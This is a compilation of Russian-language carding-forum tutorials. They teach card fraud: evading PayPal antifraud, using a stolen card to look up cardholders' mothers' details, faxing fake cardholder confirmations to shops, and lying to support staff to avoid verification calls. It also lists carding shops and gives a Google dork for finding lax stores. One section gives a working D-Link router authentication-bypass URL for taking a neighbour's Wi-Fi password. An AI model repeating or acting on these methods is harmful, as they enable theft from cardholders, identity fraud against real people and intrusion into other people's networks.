Осмотрев и ознакомившись с интерфейсом сайта, для новобранцев которые впервые влились в эту частичку электронной коммерции. Жмём кнопку верификации.
Загрузка документов, в списке выбираем паспорт, ниже предложит ввести номер, вписываем серию и номер, указываем что нету срока годности у дока.
Грузим эту первую строку нашего пасса, после откроется окно аля "файл успешно загружен" оставте нам пожелание к файлу, пишем чтото типа Мой Документ или ВЕРЕФНИТЕ из этой оперы.
Написать нужно ибо не всегда отправляет зараза без пожелания к файлу.
Ждём первого письма на почту, что ваши документы приняты на рассмотрение. Обычно на следующий день верифнут, ну на второй если не вериф посылайте опять так же.
После верификации закидывайте с левой виртуалки 20уе лимит там вроде мин, либо с чего хотите.
Но для заказа карты надо 13$ отдать со счета, предварительно закинув.
Закинув заходим Net+ cards и заказываем картон, он приходить тупо в письме в почтовый ящик.

P.S.: Последний картон так получил осенью, увидев тему про нетеллер написал.


Пробив MDOB MMN

Всем привет! В ожидании селлера СС, решил написать вторую статейку для нашего форума). В этот раз я вас научу пробивать необходимую информацию о матери картхолдера :D А именно, дату рождения матери (MDOB), и девичью фамилию матери (MMN).
Для чего это нам это надо? Очень много способов применения данной инфы. Я лично использую данную инфу для прозвона банка от имени холдера, а как известно, при прозвоне в банк, чем больше инфы, тем больше у тебя вероятность на успех.
К сожалению, бесплатного сервиса пробива данной инфы, я не видел, но это не означает, что эту инфу нельзя скардить ;)
И так приступим, на понадобится самая обычная ЮСА СС или сокс или дед по предпочтению вбивателя, лично я предпочитаю дедик.
Заходим на дедик, и с него переходим на Ancestry.com, нажимаем «Start Free Trial»
На этом сайте есть 14-дневый пробный режим, но при этом карта все равно будет нам необходима, потому что для регистрации потребуется авторизация суммы, которая снимется по окончанию пробного периода.
Дальше выбираем «World Deluxe Membership», заполняем регистрационную форму, вбиваем карту, и готово! Мы зарегались! Переходим к поиску нужной нам инфы.
Заходим в «Show Advanced», заполняем поля Family Member (Выбираем “Child” и вводим данный картхолдера), выбираем пол картхолдера и жмем search.
В результатах поиска, выбираем нужного человека и нажимаем «See All information»
Ну вот и все! Надеюсь кому-нибудь моя статья окажется полезной!
Удачи в нашем нелегком деле!


Приём смс

Возникла ситуация что заблокировали почту и просили номер телефона, нашёл несколько сайтов которые принимают смс
http://onlinesim.ru - в гмайл правда не один из телефонов не залез, писали что уже использован был
http://receive-sms-online.com
http://receivesmsonline.com
http://pinger.com/tfw - просят регистрацию, почту пароль, сам не смотрел!
http://receive-sms.com - есть как бесплатные номера так и можно купить приватный номер, только походу палку принимают.
http://www.lleida.net/en/buy можно купить прием смс =D принимают виза мастер кард ! 1 смс 1 евро
И в итоге воспользовался болеё простым методом восстановления почты, был номер скайпа делавера юсы, вбил номер, попросил голосовой прозвон ! из за плохого инета услышал пароль только с 3 раза! Но всё получилось и почту разблокировали!


FAQ PayPal

Палка – одна из самых старых тем, способы работы с ней растут и развиваются, а вместе с ними растет и развивается палкин антифрод, который безбожно лочит и лемитит аккаунты.
Начнем с основной информации о Paypal.
Типы аккаунтов Paypal:
Personal - личный тип аккаунта открывающийся при первой регистрации, предназначеный только
для покупки с палки, но не для приема средств.
Сейчас практический не встречается, регистрация начинается сразу же с Premier аккаунта.
Premier - основной тип, позволяющий принимать и отправлять средства.
Business - предназначен для онлайн торговли, сайтов, фирм и частных предпринимателей.
После регистрации всегда можно повысить уровень аккаунта, например, с Premier до Business, путём ввода вымышленной информации о вашем предприятии или фирме. При каких либо подозрениях Палка может запросить у вас документы подтверждающие предоставленную вами информацию, но с этим уже не стоит заморачиваться, даже если зависла крупная сумма.
Аккаунты в палке имеют два статуса:
Verified - верифицированный аккаунт с подтвержденной картой или банковским аккаунтом.
Unverified - не верифицированный аккаунт.
Верификация нужна нам для увеличения лимитов и большего доверия палки.
В зависимости от страны есть несколько видов верификации.
Для USA палок она проходиться добавлением и подтверждением банковского аккаунта, даже без добавления СС.
Но при попытке оплаты или перевода палка все равно попросит добавить карту, при этом не обязательно подтверждая её.
Для Европы и СНГ верифицирование проходит только добавлением СС и его подтверждением.
Ниже мы рассмотрим все способы верификации.
Есть несколько Способов перевода или оплаты денег в системе.
- С баланса Paypal. Оплата Инстантом, то есть мгновенно.
- С прикрепленной СС. так же оплата инстантом. Не обязательно с подвтерждением СС
- С прикрепленного банк. акка. Два варианта.
Оплата E-Chekom - деньги получателю идут 3-4 рабочих дня.
Инстант-оплата с банка - возможна только при подтвержденном резервном источнике финансирования, то есть нужно подтвердить прикрепленную СС или VCC. Палка дает нам как бы оплатить в долг, снимает деньги с банк акка, но не ждет 3-4 дня. Такая оплата не всегда возможна.

Security Message
Одной из самых распространенных проблем новичков при работе с платежной системой PayPal, является их незнание элементарных принципов работы "антифродовой" защиты данной платежной системы. Не имея навыков обхода этой защиты, пользователь всегда будет сталкиваться с так называемой "Security Measure?" - блокировкой аккаунта, где ему будут предлагать ввести полный номер карты и банковского счета данного аккаунта, а так же с прозвоном.
В большинстве случаев это делает невозможным дальнейшую работу с аккаунтом.
Есть основные способы избежать как избежать этой беды.
Для палки с логов они такие:
a) IP сокса или дедика ранеё не должен был засвечен в палке, причем не только во фроде, но и в логине на другой акк. Исключение – диал-апные сегменты популярных провайдеров.
б) Максимально приближенным к IP адресу реального владельца акка, точнеё говоря быть
максимально похожим на IP с которого обычно совершаются все действия на акке. В идеале – откопать реальный IP холдера и соксы подбирать под него.
Встает вопрос, использовать ли соксы или деды при работе с палкой. Здесь все зависит личных предпочтений.
При работе с соксами необходима полная настройка виртуальной машины под вбив.
Я же советую работать с дедиками. В таком случае такая настройка системы отпадает т.к. мы получаем готовую машину американского пользователя. Так же соксы очень быстро дохнут, что для нас с вами не есть хорошо, т.к. мы будем работать с саморегами, которые прослужат нам приличное время.
И так настал момент, когда в очередной раз палка лимитнула твой акк или отклонила траншу с карты на своем мерче. Причина этого в большинстве случаев не вычищенный дед, с которого ранеё регистрировали акк или же заходили в уже существующий.
В той статье я расскажу, как на 99% исключить «осечки» из-за грязного деда.

1. Первое что нужно сделать - это удалить данные папки
C:\Users\user_name\AppData\Roaming\Macromedia
C:\Users\user_name\AppData\Roaming\Adobe
Или же (зависит от системы)
C:\Documents and Settings\ user_name \Application Data\Adobe
C:\Documents and Settings\ user_name \Application Data\ Macromedia
Ну и самым простым будет поиск в папке Users или Documents and Settings папок (Macromedia и Adobe) и удаление их.

2. Шаг второй. Идем по ссылке hxxp://www.piriform.com/ccleaner
Cкачиваем ccleaner на дед. Устанавливаем.
Убираем галочки при установке, дабы нас не спалил админ.
Запускаем ccleaner, выставляем галочки на вкладке Windows.
На вкладке Applications ставим ВСЕ галочки:
Запускаем прогу лёгким нажатием кнопки «Run Cleaner». Ждем окончание процесса чистки и переходим к шагу 3.

3. Шаг третий чистка реёстра.
Переходим на вкладку “Registry” в ccleaner, выставляем все галочки:
Щёлкаем «Scan for issues». Ждем. Затем «Fix selected issues» (естественно выбираем все что нам нашла прога).
Но это не все. Закрываем ccleaner.
Затем пуск->выполнить (или кнопка Win +R) вписываем «regedit».
После запуска редактора реёстра жмем вкладку Edit-> Find в строку поиска вписываем paypal, жмём «Find Next» и удаляем все, что находит редактор.
И так очистка деда завершена.
Не забываем удалить CCleaner дабы продлить жизнь деду. Некоторые Security Measures, такие как прозвон пейпалом холдера при подозрительных транзакциях, можно обойти если слать платеж через пожертвования. Думаю все слышали про кнопку Donate!?
Чтобы совершить такой платеж мы должны сгенерировать специальный URL. Для этого идем по адресу -> https://www.paypal.com/cgi-bin/webscr?cmd=_donate-intro-outside
При этом нам не нужно иметь пейпал аккаунта и быть logged in.
Кликаем "Create your button now" и следуем инструкциям палки, ну и моим подсказкам.
1. Choose a button type - удостоверьтесь что выбрана опция "Donations"
2. Organization name/Service - Компания или сервис, принимающие пожертвование - пишите, что угодно. Проявите фантазию.
3. Currency - выбирайте в какой валюте будете принимать пожертвования
4. Donors enter their own contribution amount - чекаем это. Будем сами прописывать сколько отправить денег.
5. E-mail address to receive payments - мыло палки, на которую будем переводить деньги.
Кликаем Create Button.
На новой странице выбираем таб Email и копируем ссылку.
Теперь её можно просто вставить в строку браузера и переводить деньги.


Мы внутри господа, осмотримся

Доброго времени суток всем. Сейчас сидел общался со своей подругой, которая любезно делает для нас прозвоны (я обешал ей красное ферари в течении года) и услышал много интерсного для меня, инфа будет полезна новичкам, а может и старичкам. Сравнительно недавно, она поработала какое-то в время в антифроде международной компании по всяким там цветам конфетам и т.д., (довольно большая компания, а платят сотрудникам копейки, стыд и срам), так вот, предлагаю водрузиться на её место и обработать поступивший нам ордер. Итак, поехали.
Нам поступил ордер. Первое на что мы обращаем внимание это имя картхолдера и его имейл.
1. Имя Maria Jones; email [email protected](maria.jones;m_jones;maria_jones) - отлично 5 баллов!
2. Имя Maria Jones; email [email protected](sexyberry и т.д.) - подойдет 4(мариа дрянная девчонка, любит хулиганить, почему нет)
3. Имя Maria Jones; email [email protected] - неуд 3(maria..pudge..whaaat?)
4. Имя Maria Jones; email [email protected] - плохо 2, уже вызывает недоверие, как говорится встречают по одежке, так что..
Это не критично, но тем не менеё будет изначально плохое отношение к ордеру. потому что им сказали на обучении, что так хорошо, а так плохо. Там где плохо - одобришь, фродом окажется, фистюлей вставим, ЗП отожмем. Идем дальше.
Получатель Имя+Мейл=практически та же история, что и с отправителем.
Для того чтобы сразу складывать о себе положительное впечатление лучше соблюдать эти мелочи.
Ибо на обучение их дрочкают, что так и никак иначе, а платят копейки, и никто на долго не задерживается у них, соответственно никто не успевает забыть обучение и начать уже халатно относится к работе, как все нормальные люди.
Далее мы смотрим Greeting Cart - то есть часть где пишется поздравления/пожелания

1. Dear Name, мне было так хорошо с тобой и, вообще, ты просто бриллиантовый человек, я тебя люблю очень очень, с днём рождения киса! Надеюсь мы скоро увидимся, а пока прими же в дар этит цветы и мишку. - вот так вот, это на 5, ВАЖНЫЙ момент здесь это обращение в начале, то бишь Дорогая Маша/Саша/Игорь, без этого почему то у них вызывает подозрение. не знаю почему. И не унылые поздравления с первой ссылки из гугла, по запросу birthday message, а что-то свое, от чистого сердца и с душой, можно и чужое, но тоже с душой.
2. Happy Birthday! - 2, но не game over ещё)
Опять же не сильно важный момент вроде бы, но тоже складывает общеё впечатление о вас. как о реальном картхолдере. Идём дальше.

Наконец мы открываем программу под названием Антифрод - здесь мы видим IP c которого был составлен ордер, и телефон холдера(тот который оставили в ордере), и вообще кучу всего ещё мы тут видим
1. IP совпадает со штатом+городом холдера+телефон код подходит под ареа код город - ну бл* ну 5++, красава
2. IP совпадает со штатом + телефон под штат - GJ 5, вопросов не вызывает, отлично
3. все вопросы c разными IP решаются по средствам прозвона с легендой(я из европы, но я по работе..ну вы поняли) после заказа. Ничего вобщем страшного в этом нет, их шоп работает со всеми международными карами, и откуда только там кто не заказывает. В любом случае регламент предусматривает подтверждение оплаты звонком.

И вот на этом месте она устала и ушла спать, но отпишу ещё пару важных мулек:
1. Шоп видел billing address всех карт, не только УСА. но и ЕУ
2. CAUTION! Для прозвонщиков (подтверждение оплаты) - когда вас просят назвать ваши данные, не надо их смотреть в компьютере, КЛАЦ КЛАЦ и всё ордер убит, важно не забывать о том что холдеры не смотрят данные сс на компьютере, они просто достают карту из кармана. Регламент нашего шопа запрещал работникам одобрить ордер тех кто клацал мышкой называя номер сс, и их не волнует что возможно вы в этот момент тащите мид, всё game over (думаю так во всех антифродах). А вот плюсом же здесь будет, если вы сделаете вид что копаетесь в портмоне доставая свою карту или что в этом роде.
Не серчайте за орфографию и стиль написания, я безграмотный неписатель, если будет интересно что дальше, то я постараюсь сегодня пораньше созвониться и дописать. P.S. сейчас сижу в скайпе оставшемся после работы (их несколько, они общие походу, почти год общаюсь за их счет), слушаю мессаджи которые им оставляют, жду рабочую конфу, надеюсь удастся прорваться и послушать что-то интересное.


Фишки с факсом

При работе с интернет-магазинами часто приходится сталкиваться с проблемой - требованием шопа обратного прозвона и предоставления скана цц кх.
При отсутствии возможности обратиться за услугой к сервисам на форуме или заморочиться самостоятельно, при каждой просьбе дополнительной верификации, отправляйте факс на номер магазина. Для убедительности укажите координаты среднего по уровню компании или предприятие того региона, в котором базируется шоп.
Добавьте данные обычной свв с примерным текстом на английском языке:
"Я, Ф.И.О. кх в данный момент предоставить скан не могу, так как нахожусь на смене или недельной вахте, карта дома. Подтверждаю что совершил покупку в интернет-магазине № заказа, использовал № карты *** банка ***. Прошу отправить заказ по указанному адресу." Дата, подпись (вставить любую картинку).
Измените и добавьте содержание факса на свое усмотрение - проявление вашей творческой деятельности.
Так же этот незамысловатый метод можно использовать для смены адреса (перенаправления)
посылки на уровне формирования заказа или в процессе доставки коммерческой службой.

Сервисов по онлайн отправке факсов большое количество, некоторые из них:
faxzero.com
faxinating.com
gotfreefax.com
onlinefaxservice.com
efax.com


Подключение к чужому Wi-Fi для везучих

Итак, если вам крупно повезло, и у кого-нибудь из ваших соседей стоит роутер D-Link DIR-300, 320, 600, то вы можете воспользоваться его интернетом.

Нам понадобится:
1. Advanced IP Scanner
2. ipgeobase

Начнём.
1. Устанавливаем Advanced IP Scanner. Идем к соседу, спрашиваем какой у него ip. Если говорит - переходим к пункту 4. Если нет - пробиваем его провайдера. Если пробить не получилось - сидим и перебираем всех провайдеров города трое суток, пока не найдем нужный нам роутер.
2. Заходим на ipgeobase - расширенный поиск - заполняем поле "Город" - нажимаем "Искать". В выпадающем списке выбираем нужного нам провайдера - нажимаем "Поиск".
3. Запускаем программу Advanced IP Scanner и через запятую копируем в неё диапазоны найденных ip. Нажимаем "Сканировать". Ищем компьютеры, слева от которых есть галочка и нажимаем её. Если видим название нужного нам роутера дважы кликаем мышкой по нему и нас перекидывает в браузер для подключения.
4. Браузер кидает нас на роутер, в адресной строке видим ip роутера, к которому нужно добавить / bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 и мы попадаем на страницу, где видно SSID сети и пароль от неё. Если все же сосед дал вам свой ip, то пишем его в брауер и добавляем эту же строчку)
После чего спокойно подключаемся к сети. Скрина на этот пункт нет, т.к. не нашел у соседей D-Link'a


Защита vpn от падения

Очередная важная статейка на тему анонимности. В ней речь пойдет о такой важнещей теме как падение vpn туннеля и начало движения трафика по каналу провайдера в открытом виде. Думаю не
стоит говорить о том, какие последствия может иметь вход, например, в icq со своего реального ip для человека в серых/черных движениях, особенно когда он в разработке. Поэтому однозначно нужно тут себя обезопасить.
Первое что хочу сказать это то, что я не доверяю приложениям вроде openVPN Protector и иже с ним, потому что в основном они лежат на всяких серых форумах и что в них заложено или что в
последствии прицеплено к программе сказать трудно. Поэтому ну их в топку) Мы будем пользоваться нормальным файрволлом, тем болеё что помимо ограничения трафика через vpn он дает нам ещё кучу плюсов.
И так, будем как обычно говорить про windows, ведь пользователей linux у нас, к сожалению, не так много. Да и они, обычно сами с усами) Я предлагаю рассмотреть как ограничить трафик на примере бесплатного COMODO Firewall и OpenVPN клиента (вряд ли кто-то использует что-то другое). Вы можете взять любой другой файрволл, там все будет аналогично. Посмотрев как обычно предлагают настраивать для этой цели COMODO Firewall в интернете, я немного опешил. Мы не будем ограничивать трафик по ip адресу нашего vpn сервиса (что равносильно пытаться удалить гланды через задний проход), мы сделаем универсальное правило которое будет работать всегда, к какому бы мы сервису не решили подключиться.
С начала нам нужен установленный и готовый к работе клиент OpenVPN (думаю тут ничего пояснять не нужно, все уже должны его иметь в наличии). В меня пуск снизу пишем cmd, в открывшейся консоли пишем ipconfig /all и ищем адаптер, созданный OpenVPN клиентом. Обычно это TAP-Windows
Adapter V9. Нам нужен его MAC адрес:
Теперь идем в настройки COMODO Firewall и создаем новую сетевую зону, называем её, например, VPN. В этой сетевой зоне создаем новый адрес, тип MAC-адрес. Вводим MAC нашего OpenVPN адаптера найденного выше через cmd-консоль:
Переходим в закладку Набор правил и создаем новый набор правил, в которое добавляем 3 простых правила:
1. Разрешить входящий IP трафик из любой сети в сетевую зону VPN
2. Разрешить исходящий IP трафик из сетевой зоны VPN в любую сеть
3. Запретить любой входящий и исходящий IP трафик
В итоге получаем вот такой набор правил на скрине ниже:
Далее нужно добавить правила для приложений использую наш только что созданный набор правил vpn_only:
Теперь осталось добавить все приложения нуждающиеся в аналогичной защите (icq, jabber и т.д.) и радоваться что теперь не нужно будет переживать что вышел в онлайн в жабе до того как поднялся vpn по затупу.
Правило работает для любого конфига OpenVPN на данной машине и никак не зависит от адреса vpn сервера и прочих вводных.
Как-то так. Всем добра и анонимности.


Консоль браузера и скам-скирны
Всем мой пламенный привет после вынужденного длительного отсутствия. Возобновим публикацию статей. Сегодня маленькая статейка о подделке скринов сайтов, переписок и прочих вещей, отображающихся через браузер (форумы, чаты, вк и т.д.). С одной стороны статья призвана переосмыслить отношения некоторых людей к "пруфам" в виде скриншотов, с другой стороны она написано для тех, кто занимается СИ и прочим скамом. Многие в курсе данной темы, но так же многие, к моему удивлению, воспринимают следующую информацию как откровение. Приступим.
Работать мы будем через консоль браузера Firefox, конкретно через инспектор DOM и стилей. Для начала нам нужна страница, от контента которой мы будем отталкиваться. И для примера я возьму чат (сразу напишу: парни без обид, это просто пример, никого обидеть и в мыслях не было):
Теперь выбираем интересующий нас фрагмент страницы, который мы хотим изменить, жмем правой кнопкой и выбираем "Исследовать элемент", в открывшемся снизу окне даблкликаем между <div> и </div> для раскрытия элемента, внутри видим текст и меняем его:
Таким образом за пару минут можно получить следующеё:
Немного потренировавшись легко освоить эту технику и менять любые параметры страницы: текст, картинки, счетчики сообщений в вк и прочеё. То есть вообще любые свойства отображенной страницы без заморочек, с графическими редакторами с точно выверенным стилем исходного сайта.
Как-то так, всем добра.


Отмазываемся от прозвона

На многих таких сайтах есть функция онлайн сапорт. Так вот стучу туда и говорю Я мега-инвалид, говорить отродясь не могу, => не могу позвонить, к моему удивлению добродушный сапорт отвечает:
Сэр, в таком случае вам не придётся звонить нам, просто оплатите заказ, в случае проблем с получением отправьте мне номер вашего заказа и всё будет Окай.
Так же если сапорт настырный кричите, топайте ногами, и говорите что приехал в странну пару дней назад, живу в вагоне, юзаю Ви-Фи (но до этого лучше не доводить, ибо сапорт предлагает вам найти друзей).
Если после того как вы вместе с сапортом поплачите над вашей никчемной жизнью, сапорт скажет мы не можем провести сделку с вами, орите благим матом, что засудите их к чертовой матери, мотивируя это тем, что вас оскорбили как личность,отказались помочь больному человеку и пр.
Ну а если не помогло,готовьте честно скарженные WMZ и оплачивайте прозвон. Всем удачи.
Предлагаю делиться вашими способами отмазки от прозвона.

Безопасность: Шифруемся

Всем привет!В данной теме я опишу каким способ ом я обезопасил доступ к своей рабочей системе и информации, которые помогаю мне в моих кардерских проделках.
И так… В качестве виртуальной машины я используюvmware workstation (версия 10.0.1).
Изначально я пробовал работать по методичке. Установил и настроил VirtualBox, но в итоге что-то пошло не так и система на ней умерла. Да и вообще ранеё я имел дело только с vmware, эта программа проста в использовании и постоянно обновляется.
Так же у vmware есть то чего нет у VirtualBox, функция "Защита виртуальных машин 256-битным шифрованием от неавторизованного доступа пользователей к конфигурационным файлам"
Кратко говоря ваши файлы виртуальной машине зашифровываются. После чего Вы не сможете запустить виртуальную машину, т.к. программа потребует ввести пароль. Многие скажут нафига это надо, ведь у меня пароль стоит на windows. Согласен, пароль на windows это хорошо, но получить доступ к ней можно за несколько минут. В сети полно загрузочных дисков в составе которых программа сбрасывающая пароль любой учетной записи windows.
И тут к нам на помощь приходит чудо функция шифрования. Даже если у Вас скопируют папку со всеми конфигурационными файлами, этого человека ждет облом, т.к. без пароля ему ничего не светит.
Практика: Опишу только сам процесс шифрования.
1) Жмём на Edit virtual machine setting
2) Переходим на закладку Options
3) Жмём на Access Control (напротив будет указан текущий статус Not encrypted)
4) Приступаем к шифрованию, жмем Encrypt, вводим пароль и снова жмем на Encrypt (я использую пароль состоящий из 30 символов, Русские буквы на английской раскладке, чтобы не париться с запоминанием, используйте в качестве пароля какой-нибудь отрывок из стиха)
Теперь ждем окончания шифрования.
Поздравляю! Ваша виртуалка зашифрована! В дополнение к этому можно еще поставить пароль на изменение настроек (желательно отличный от предыдущего).
Все манипуляции проводим в том же разделе шифрования:
Ставим галочку на Enable restrictions, вводим пароль и жмем ок. Теперь когда Вам необходимо будет войти в настройки виртуальной машины, Вас попросят ввести пароль.
На этом с виртуальной машиной закончим. При желании покопайтесь в ней, может чего еще нароете.
Идём дальше! Шифрования виртуальной машины мне показалось мало. Хотелось аппаратного шифрования, но как этого добиться?
В этом вопросе мне помог гугл:
Zalman ZM-VE400 (http://www.zalman.ru/global/product/product_read.php?id=238)
Это внешний бокс для жесткого диска который имеёт функцию аппаратного шифрования (256 бит).
После того как Вы засунули в него жесткий диск, сразу рекоммендую установить последнюю прошивку с сайта производителя.
Процесс шифрования:
1) На клавиатуре бокса жмем кнопку Menu->Encryption->Set Encryption
2) Вводим пароль (8-значный)
3) Немного подождав отсоедините устройство от ПК, подсоедините заново и Вы увидите запрос на ввод пароль (у Вас есть 10 попыток)
4) После установки пароля жесткий диск не виден системой, необходимо создать раздел и отформатировать
- Жмём правой кнопкой по «Мой компьютер» ->Управление->Управление дисками
Появится окно инициализации диска, жмем сразу ОК.
Тут же в "Управление дисками" чуть ниже есть список жестких дисков, один из них Ваш внешний жёсткий диск с нераспределенной областью. Жмем правой кнопкой по нему и создаем новый раздел (жмём все время Далее по умолчанию)
Теперь Ваш диск виден в системе, смело можете закидывать на него виртуальную машину
Несмотря на то что виртуалка грузится с внешнего жесткого диска, все работает хорошо и не тупит.
Для достижения максимальной скорости советую использовать интерфейс USB3 и вместо жесткого
диска твердотельный SSD диск.
Если извлечь жесткий диск и установить его в обычный бокс, система его не увидит, он будет
отображаться как жесткий диск с неразмеченной областью.


Идея, по поиску материала (сс)

Доброго времени Суток клубчане
Что бы был удачный проход нужен хороший материал! Когда с Ev!l по EU cc случились непонятки, возникла идея, по находке картона в ЮСА, а так же осуществить поиск и по европе. Везде есть такие же, как и мы, и уж точно будут валид шопы с СС.
Вообщем пару вбивов в поиск что-то нашлось... Сам не особо проверял:
hackedcvv.su
kingscard.ru
nonvbv.ru
pirates-cc.ru
procvvshop.ru
bestbins.ru
cvvshop.net
verifiedshop.ru - список шопов и прочих фишек
carderpro.com - тоже много интересного
approvedcc.su

Предлагаю заняться mass поиском по Good eu СС по странам и выявить лучшие...


Неубиваемые куки, будьте осторожны!

Много и долго писать не хочу, просто лаконично поведаю о жуткой вещи под названием проект Evercookie, который начинает активно использоваться многими интернет-ресурсами, с одной лишь целью - никогда не потерять информацию о посетителе сайта и о том, что посетитель уже был на сайте.
Evercookie - это бесплатная js библиотека, которая великолепно справляется с одной лишь задачей - оставляет куки на компьютере посетителя сайта и читает их, причем оставляет не одним способом, а десятками способов - тут и flash хранилище кук, и классические куки, и хаки браузеров и даже сохранение кук в пустом изображении png и последующеё кеширование этого изображения.
Те, кто беспокоится за свою анонимность, проверяйте свой софт по очистке кешей и кук на устойчивость к Evercookie, так как библиотека получает популярность, а значит не за горами день, когда начнут баниться различные аккаунты за мультилогин и прочеё, тут ни VPN, смена браузеров не спасут.
Добавлю от себя еще. Видел что у многих не вбивалось, т.к. видимо это куки еще оставались. Ставьте CCleaner + CCEnhancer (расширенная версия) и они уберут у вас любые куки, при условии, что все галочки буду стоять.
Видно что CCEnhancer добавил много расширений для чистки, этим и пользуйтесь.


Свои landing phone numbers

Давно хочу поделиться с соклубниками как я принимаю войсы и звонки, а также лишний раз не палюсь с сомнительным номерами телефонов. Я даю шопам landline номера географически находящиеся с том же городе где и пересыл (ходят слухи что это полезно для вбива).
Во как! Понравилось? Заходи на еvоicе.cоm
Жмём Compare Planss & Pricing
Обычно выбираю план за 13$ в мес
Указываем штат и город нашего принималы и выбираем красивый номер. После тыкаем Select number
Далее вбиваем данные сс. AVS нет. Лезет в том числе и европа из отработки.
Так мы зарегили себе номер. Далее его нужно немного настроить.
Сразу отключаем функцию Auto Attendant. Это расширение позволяющеё компании перенаправлять звонящих по разным отделам, по примеру "нажмите 0 для общения с суппортом".
Для приема войсов, в том числе для роботизированной верификации в меню Settings включаем Voicemail to Email Forwarding. Эта функция позволяет принимать войсы и читать их уже распознанными у себя на почте.
Выглядит это так:
Иногда шоп ни в какую не хочет принимать звонок, ему надо самому прозвонить холдера.
Для приема звонков нужно включить и настроить функцию перенаправления. Для этого предварительно просим у прозвонщика его sip для приема звонка (отлично работает telephone из
полезных контактов!) и идем в Call Routing. Оставляем Basic, жмем edit и добавляем номер.
Обязательно попроси прозвонщика протестировать работу роутинга, если все работает давай отмашку шопу.
И отлаверды. Прошу бережно отнестись к этому сервису, хоть о телефонах при вбиве голова не болит...


Gmail без привязки к мобильному

Приветствую вас коллеги! Ниже я расскажу как зарегистрировать акк gmail без привязки к номеру.

Итак поехали, нам понадобиться
1) Образ Андройда качаем.
2) Виртуальная машина (уже должна быть у всех) проверял на хиперВ и на ВМваре, думаю на остальных тоже работает.

1. Создаем новую машину
2. Выбираем образ Андройда
3. Даём имя нашей машине и выбираем где будет лежать (вот и нашлось что можно спрятать в первый контейнер, вроде и нарушаем, но совсем чуточку)
4. Требования минимальные к машине (хотя мой первый ПК не мог похвастаться даже такими)
5. Запускаем и выбираем Run android
6. Setup Wizard
7. Я выбираю Инглиш, но думаю, что можно и РУ, жмем старт
8. Выставляем время и Далее.
9. То для чего все это и делается: Get an account
10. ФИО кардхолдера
11. vladimirputin@gmail занят (интересно, это его корп ящик?) подбираем подходящеё сочетание букв и цифр
12. Пишем пароль
13. Выбираем секретный вопрос и ответ на него(вдруг забутите пароль от нафиг не нужного ящика.
14. not now (ненужны нам сервисы гугл+)
15. Капча. Пользователи Тор должны их уже с закрытыми глазами вбивать.
16. Жмем Skip. Хотя...можете скардить фулл версию ангри бердс.
17. На этом виртуалку можно и потушить, за исключением того случая, если вы все таки решили кардить злых птиц и играть на компе.
18. Вот он наш новенький ящик.


Как за минуту обменять QIWI на любой WMR - WMZ кошелек?

Мой сервис уже работает полтора месяца примерно, стучиться очень много людей, у кого проблемы с
валютой. Т.к я киви не принимаю, многие начинают искать менял, обменки и так Далее, чтоб обменять киви на вм. Совсем недавно, киви ввел функцию обмена прямо у себя на сайте. Многие не могут найти эту заветную кнопку и произвести обмен. Попытаюсь скринами показать, что и куда тыкать. Т.к смотрю многие нуждаются, будет не лишним.
Заходит в свой ЛК киви, нажимаем ОПЛАТИТЬ.
Далее появляется окно с услугами, где мы можем выбрать заветные WM:
Клацаем на Webmoney =>
Вводим номер КОШЕЛЬКА ( НА КОТОРЫЙ ВЫ ХОТИТЕ ЧТОБ ПРИШЛИ ВМР ), СУММУ и НАЖИМАЕМ ОПЛАТИТЬ.
Готово. Белые деньги поступят на Ваш ВМ счет с примечанием чето-то там в счет ценных бумаг и так Далее.
Так же может при первом разе выскочить окно, где согласно нового закона Вас попросят ввести фио и что-то ещё. Можете ввести от балды.
От киви - вы получаете только ВМР (ВМЗ ОН НЕ ШЛЕТ), ВМЗ вы можете уже купить после того как получите ВМР, лучший курс можете найти на http://bestchange.ru
Комиссия: 5,00%
Минимальная сумма платежа: 2,00 руб.
Максимальная сумма платежа с учетом комиссии: 14 999,00 руб.
Да, 5 процентов, зато быстро и надежно.
Надеюсь кому-то помог, всем удачных обменов и вбивов


Дыра в системе (РЕАЛ) old Связной
Тема старенькая белая.
Как во многих системах магазинов бывают какие то дырочки.
Была раньше акция в Связном в МСК года 2 назад - платишь 300-500 рублей когда покупаешь телефон.
Возврат телефона 2 недели, не понравился принёс забрал деньги. Состояние какое брал такое отдать.
Многие наверно знают бонусная карта связного с каждой покупки начисляются баллы, а на них можно покупать как за деньги. Идем на прогулку в разных связных покупаем штуки 4 телефона тысяч по 30 везде услугу докупаем. А баллы с каждой покупки на одну карту копим. 30 тысяч в размере баллов около (2500-3000 руб.). Разница навара через пара дней приносим сдаем. А баллы остаются. За пара недель пара айфонов сделали.


Шопы с пополнением баланса
найти шопы с внутренним пополнением баланса. Кто не понял, что это за шопы, вот пример - шоп. хусейл wholesale-dress.net
В чем плюсы, и преимущества данных шопов? Почему люди интересуются такими шопами?
Ответ просто. Похуистичность биллинга и шипинга.
Т.е. смысл работы данных шопов: Вы зарегистрировались, зашли в акк и вид пополнили внутренний счет. В основном эти шопы хавают палку, но половина их, так же хавает сс. И после успешной оплаты мы видим следующую картину:
После чего, мы смело можем шопится на этот баланс, и при чекауте указать данные дропа, и списание средств с внутриннего баланса. Если загонять чекаут сразу с палки либо же сс, ваш ордер будет обрабатываться долго, и при чардже, будет отмена. С баланса же, данные шопы играют в игру "Похуй".
Итак. Ближе к делу. Много раз видел на форумах, как люди спрашивали за шопы, с пополнением баланса. И мне стало не по детски интересно, найти самому данный сабж. Как я анализировал и подготавливался к поиску?
Для начала пробил CMS на которой крутится хусейл. Гугл выдал мне сервис скриптов для таких китай шопов chinascript.ru
Там мы видим 3 вида скриптов для создания таких вот шопов с балансами. Это ECShop, ECMall, UCenter
Ну ок, спасибо за помощь данному сервису. Начинаем гуглить. Составляем плавильную дорку под поиск.
intitle:powered by ECShop
Но гугл выдает в выдаче, не нужный мусор. Будем отсеивать. Идет в хусейл. Смотрим стуктуру урла.
Вообщем, выбираем параметры поиска под себя.
Я выбрал, создал поисковый запрос, и у меня получилось моя дорка
intitle:powered by ECShop intext:User Center_ inurl:user.php

Далее в гугл, и что мы видим?
А видим мы овер дохуя шопов, с пополнением внутреннего баланса.

Теперь под-итожим плюсы данных шопов.
- Долго идущий чардж (было такое, что пополнил счет, и с внутреннего счета раз в неделю, целый месяц щипал стаф).
- Похуистичность система, что пополнял Джон Смит, а шипинг адрес Вася Пупкин.
- При чекауте с палки, не так сильно ерорит, как в других шопах.
- Кто не владеёт искусством работы с пайпал, половина шопов поддерживает прием оплаты с СС.
- На данных шопах крутятся не только шмотки, есть и електроника, телефоны (правда все китайское).

